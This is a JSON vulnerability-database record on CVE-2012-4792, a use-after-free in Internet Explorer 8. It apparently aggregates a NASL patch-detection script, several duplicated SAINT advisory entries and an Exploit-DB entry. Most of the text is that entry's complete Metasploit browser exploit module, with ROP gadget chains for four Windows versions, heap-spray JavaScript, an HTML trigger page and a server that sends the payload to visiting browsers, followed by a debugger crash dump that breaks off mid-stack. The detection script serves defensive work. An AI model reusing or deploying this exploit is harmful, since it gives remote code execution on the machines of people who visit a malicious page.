http://technet.microsoft.com/en-us/security/bulletin/ms13-008\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\";\n\nif(description)\n{\n script_id(902699);\n script_version(\"$Revision: 6093 $\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-10 11:03:18 +0200 (Wed, 10 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51695\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027930\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2794220\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_keys(\"MS/IE/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 
2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Use-after-free vulnerability in CButton is actively used in-the-wild.", "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "SECURITYVULNS:VULN:12835", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12835", "title": "Microsoft Internet Explorer use-after-free vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) 
\nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:2EF245955FDA0606FF9A743D9132C6A8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "title": "Internet Explorer CButton Use After Free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. 
\n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "id": "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. 
This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:DCB95B394157102378C2A8CADFE280E8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:48:26", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "EDB-ID:23785", "href": "https://www.exploit-db.com/exploits/23785/", "type": "exploitdb", "title": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => \"8.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:rank => GoodRanking\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n\t\t\t\tuse-after-free condition occurs when a CButton object is freed, but a reference\r\n\t\t\t\tis kept and used again during a page reload, an invalid memory that's controllable\r\n\t\t\t\tis used, and allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'juan vazquez', #Metasploit\r\n\t\t\t\t\t'sinn3r', #Metasploit\r\n\t\t\t\t\t'Peter Vreugdenhil' #New trigger & new exploit technique\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'BID', '57070' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 
'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n\t\t\t\t\t[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\r\n\t\t\t\t\t[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen 
'5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie8_smil(my_target, p)\r\n\r\n\t\tcase my_target['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase my_target.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\r\n\t\t\tend\r\n\t\telse\r\n\t\t\talign_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\r\n\t\t\txchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\r\n\t\tend\r\n\r\n\t\tpadding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\r\n\t\tjs_payload = Rex::Text.to_unescape(p)\r\n\r\n\t\tjs = %Q|\r\n\t\tunicorn = unescape(\"#{padding}\");\r\n\t\tfor (i=0; i < 3; i++) {\r\n\t\t\tunicorn += unescape(\"#{padding}\");\r\n\t\t}\r\n\r\n\t\tunicorn += unescape(\"#{js_payload}\");\r\n\r\n\t\tanimvalues = unescape(\"#{align_esp}\");\r\n\r\n\t\tfor (i=0; i < 0xDC/4; i++) {\r\n\t\t\tif (i == 0xDC/4-1) {\r\n\t\t\t\tanimvalues += unescape(\"#{xchg_esp}\");\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tanimvalues += unescape(\"#{align_esp}\");\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tanimvalues += unicorn;\r\n\r\n\t\tfor(i = 0; i < 21; i++) {\r\n\t\t\tanimvalues += \";cyan\";\r\n\t\t}\r\n\t\t|\r\n\r\n\t\tif 
datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase t.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\trop_gadgets =\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n\t\t\t\t\t0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0xffffffff,\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n\t\t\t\t\t0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n\t\t\t\t\t0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n\t\t\t\t\t0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\trop_gadgets 
=\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x77ba1114, # <- *&VirtualProtect()\r\n\t\t\t\t\t0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\t\tjunk,\r\n\t\t\t\t\t0x77bb0c86, # XCHG EAX,ESI # RETN\r\n\t\t\t\t\t0x77bc9801, # POP EBP # RETN\r\n\t\t\t\t\t0x77be2265, # ptr to 'push esp # ret'\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03C0990F,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\r\n\t\t\t\t\t0x77bb48d3, # POP EBX, RET\r\n\t\t\t\t\t0x77bf21e0, # .data\r\n\t\t\t\t\t0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\r\n\t\t\t\t\t0x77bbfc02, # POP ECX # RETN\r\n\t\t\t\t\t0x77bef001, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t0x77bd8c04, # POP EDI # RETN\r\n\t\t\t\t\t0x77bd8c05, # ROP NOP (-> edi)\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03c0984f,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f\r\n\t\t\t\t\t0x77bb8285, # XCHG EAX,EDX # RETN\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\tnop,\r\n\t\t\t\t\t0x77be6591 # PUSHAD # ADD AL,0EF # RETN\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\trop_gadgets =\r\n\t\t\t[\r\n\t\t\t\t0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n\t\t\t\t0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)\r\n\t\t\t\t0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]\r\n\t\t\t\t0x7c3415a2, # JMP [EAX] [msvcr71.dll]\r\n\t\t\t\t0xffffffff,\r\n\t\t\t\t0x7c376402, # skip 4 bytes [msvcr71.dll]\r\n\t\t\t\t0x7c351e05, # NEG EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c344f87, # POP EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0xffffffc0, # Value to negate, will become 0x00000040\r\n\t\t\t\t0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c34d201, # POP ECX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c38b001, # &Writable location 
[msvcr71.dll]\r\n\t\t\t\t0x7c347f97, # POP EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n\t\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]\r\n\t\t\t\t# rop chain generated with mona.py\r\n\t\t\t].pack(\"V*\")\r\n\t\tend\r\n\r\n\t\trop_payload = rop_gadgets\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\trop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\telse\r\n\t\t\trop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\r\n\t\tend\r\n\t\trop_payload << code\r\n\t\trop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie8_smil(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\r\n\t\t<head>\r\n\t\t<meta>\r\n\t\t\t<?IMPORT namespace=\"t\" implementation=\"#default#time2\">\r\n\t\t</meta>\r\n\r\n\t\t<script>\r\n\t\tfunction helloWorld()\r\n\t\t{\r\n\t\t\te_form = document.getElementById(\"formelm\");\r\n\t\t\te_div = document.getElementById(\"divelm\");\r\n\r\n\t\t\t#{js}\r\n\r\n\t\t\tfor(i =0; i < 20; i++) {\r\n\t\t\t\tdocument.createElement('button');\r\n\t\t\t}\r\n\t\t\te_div.appendChild(document.createElement('button'))\r\n\t\t\te_div.firstChild.applyElement(e_form);\r\n\r\n\t\t\te_div.innerHTML = \"\"\r\n\t\t\te_div.appendChild(document.createElement('body'));\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\ta = document.getElementById('myanim');\r\n\t\t\t\ta.values = animvalues;\r\n\t\t\t}\r\n\t\t\tcatch(e) {}\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(helloWorld())\">\r\n\t\t<t:ANIMATECOLOR id=\"myanim\"/>\r\n\t\t<div id=\"divelm\"></div>\r\n\t\t<form 
id=\"formelm\">\r\n\t\t</form>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf 